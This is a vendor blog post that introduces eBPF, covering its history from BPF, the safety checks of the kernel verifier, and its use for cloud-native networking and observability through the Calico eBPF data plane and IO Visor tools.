With the recent advancements in service delivery through containers, Linux has gained a lot of popularity in cloud computing by enabling digital businesses to expand easily regardless of their size or budget. These advancements have also brought a new wave of attack, which is challenging to address with the same tools we have been using for non cloud-native environments. eBPF offers a new way to interact with the Linux kernel, allowing us to reexamine the possibilities that once were difficult to achieve.
In this post, I will go through a brief history of the steps that eBPF had to take to become the Swiss army knife inside the Linux kernel and point out how it can be used to achieve security in a cloud-native environment. I will also share my understanding of what happens inside the kernel that prevents BPF programs from wreaking havoc on your operating system.
In the early days of computing, Unix was a popular solution for capturing network traffic, and using CMU/Stanford packet filter (CSPF) to capture packets using 64KB PDP-11 was gaining popularity by the second. Without a doubt, this was a pioneering work and a leap forward for its time but like most solutions, it also created problems.
Massive demand for information and the old architecture of CSPF started to cause poor performance in newer machines, like the 16 MB Sun SPARCstation, leaving the world to search for a better option.
In 1992, Steven McCanne and Van Jacobson wrote a paper with eye-catching claims. They claimed that, by implementing BPF, capturing packets could be 10 to 100 times faster than CSPF. This could happen by applying kernel agents with the ability to discard unwanted packets as early as possible.
In 2014, Alexei Starovoitov extended BPF capabilities and started the eBPF movement. Today, eBPF extensions allow a developer to reach corners of the kernel that were previously impossible. eBPF offers capabilities beyond just capturing or filtering packets; it is better to refer to it as a virtual machine inside the kernel that can verify instructions and run them without changing the kernel source code or recompilation.
BPF security and use cases
It would be challenging to explain BPF without mentioning the Linux kernel. Linux is an interface that provides a solid and robust foundation for interacting with the underlying hardware. Usually, applications like web browsers run inside of the userspace, where they can issue system calls via a framework or a high-level programming language to communicate with the kernel.
BPF can be used in conjunction with the internal kernel events to probe, peek, or manipulate the operating system’s behavior. Although experimenting with the kernel might sound like a recipe for disaster, BPF verifier ensures the safety of all BPF applications before running them inside the kernel.
The first verification step begins by mapping all the areas that an application needs to access and then determines the end of the BPF program because BPF programs are not permitted to run indefinitely as it can slow down the system performance.
Next, a dry-run execution takes place to validate the overall life cycle of the BPF program and saves a detailed history of each instruction used by the program, and returns it to the verifier.
These two procedures ensure your system never gets blocked by an endless loop, and a BPF program can not use an unpacking or any other method to compromise the system. Keep in mind that explaining the verifier in detail is out of the scope of this blog post, and these two steps are just a simple summarization of what it does.
If an application is deemed safe by the verifier, it will be passed to the kernel for execution.
BPF program types
A BPF program can use BPF program types to access different parts of the kernel. These program types provide functions and helpers that can interact with different parts of the kernel.
For example, the Calico eBPF data plane uses a range of these program types to interact with the socket operations at the lowest level, allowing Calico to use the efficiency of the kernel and manipulate traffic as early as possible.
Calico Cloud is another solution from Tigera that uses BPF to provide enterprise level features such as image assurance, runtime threat defense, application-level security and observability.
Calico eBPF data plane
Tigera uses the eBPF technology to create the Calico eBPF data plane. This blazing-fast networking data plane can push a massive amount of traffic with the lowest resource cost compared to the standard Linux kernel.
Another considerable benefit of the Calico eBPF data plane is the source IP preservation.
By attaching BPF programs at the earliest point, the Calico eBPF data plane can replace the kube-proxy pods and route the traffic without changing its source IP.
IO Visor Project
While understanding programming can be beneficial, it is not a mandatory skill, and networking is not the only thing that is achievable with eBPF programs.
The IO visor is an open source project from the Linux Foundation that offers many ready to use BPF programs to interact with various parts of the system.
For example, BCC, an Io visor subproject, offers BPF programs that can interact from the device driver level to observe system calls initiated by the application layer. BCC provides a Python and Lua front-end that can help any system administrator curate output of these examples to match their needs.
kubectl-trace is another Io visor subproject that offers a way to schedule bpftrace programs in your Kubernetes cluster. Since containers share their kernel with the underlying host, BPF can show you an accurate insight into all the system calls and resource consumptions that your containerized applications are demanding.
The eBPF technology use cases are growing by the second, and a cloud-native environment is one of the most prominent candidates to reap the benefits.
I’ve shared what was interesting to me about eBPF, but in this vast landscape, there is much more to be discovered. If you’d like to know more about Calico eBPF data plane, eBPF technology, and its use cases, I highly recommend that you check out our free eBPF course at academy.www.tigera.io.
Ready to become a Calico certified operator? Try our free, self-paced certification courses today.
Join our mailing list
Get updates on blog posts, workshops, certification programs, new releases, and more!